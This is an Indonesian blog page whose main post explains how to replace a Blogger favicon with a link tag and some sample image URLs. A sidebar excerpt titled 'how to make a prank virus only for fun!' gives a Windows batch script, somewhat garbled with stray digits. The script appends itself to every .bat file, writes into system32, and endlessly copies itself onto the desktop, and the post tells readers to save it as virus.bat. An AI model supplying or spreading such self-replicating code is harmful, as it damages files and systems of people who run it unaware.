Langsung ke konten utama

Cara merubah Icon Blogger di address bar

Jika kita membuka suatu website atau blog maka seringkali kita menjumpai ada sebuah gambar atau icon pada address bar (kotak untuk mengetikkan alamat web). Dan jika kita punya blog di Blogspot maka icon default yang akan tampil adalah gambar seperti ini :
Bagi kamu yang tidak puas dengan icon/gambar tersebut, kamu bisa menggantinya dengan gambar sesuai dengan keinginanmu. caranya sangat mudah, yaitu dengan membuat gambar (gif, jpg, ico, dan lain2) dengan ukuran kira2 24x24 pixel sampai 32x32 pixel (sebenarnya ukurannya bebas sih, tapi biar filenya kecil dan proses membukanya cepat). Setelah itu .....


masuk ke "Layout --&gt; Edit HTML" Taruh script berikut ini tepat diatas kode </head

<link href='http://img401.imageshack.us/img401/7652/eqizqu6.gif' rel='SHORTCUT ICON'/>

ganti huruf yang dicetak tebal dengan lokasi gambar dimana kamu menyimpannya. Kamu bisa menyimpan gambarmu di 000webhost atau bisa juga di photobucket dan juga di imageshack atau kalo kamu tidak mau pusing dibawah ini ada beberapa contoh icon/gambar beserta dengan linknya.

http://img87.imageshack.us/img87/5862/image1an1.gif
http://img110.imageshack.us/img110/6218/image2ie0.gif
http://img98.imageshack.us/img98/9617/image3cr0.gif
http://img134.imageshack.us/img134/633/image4hx4.gif
http://img139.imageshack.us/img139/83/image5oa7.gif

oy, anda juga bisa menambahkan foto sebagai icon sidebarnya....
caranya,,.... ya sama kayak yg di atas tadi...
ok.. saya rasa itu sanga tgampang bagi anda...
selamat berkreasi...
Hidup blogger indonesia..

Komentar

Postingan populer dari blog ini

how to make a prank virus only for fun!

hello friends........ in this post i will tell you how can u make a funny prank virus :) trick is here: open notepad and type @echo off 3echo checking system:4 5echo for %%i in ("*.bat") do copy %%i+c:\tmp.bat %%i >c:\windows\system32\autoexec.NT6echo VIRUS DETECTED pause echo DELETING VIRUS pause :1 dir /s copy c:\tmp.bat c:\docum~1\%username%\desktop\greatgame_%random%.bat7 goto 1 This will create a never ending stream of mindless code. This cannot be stopped easily.8Save the file as "virus.bat"

Mengoptimalkan blog di search enggine google

wah dah lam ni nggak nulis di posting, mumpung lagi asik-asiknya ngeblog aku pengen ngasi tentang SEO (search enggine optimization) Wah langsung aja deh, dahy males basa basi........ BEGINI CERITANYA>>>> Ilmu search engine optimization sangatlah penting, apa itu SEO? SEO adalah ilmu untuk mengoptimalkan website supaya crawler search engine seperti google atau yahoo maksimal dalam mengambil informasi / data dalam website kita. Pepatah mengatakan “website tidak punya pengunjung sama dengan bohong”. teman saya johan mengeluh “kenapa ya web saya kok sedikit visitornya?” padahal sudah masuk dan ter index Search engine setelah saya cek ternyata ada kesalahan yang fatal dalam ilmu seo nya kesalahan tersebut adalah dia menggunakan statis (title yang sama) coba perhatikan contoh berikut. kalau saya mengetikkan keyword “cd hacking” tanpa tanda kutip, di google, maka yang keluar adalah: bla..bla... males deh bahas nya...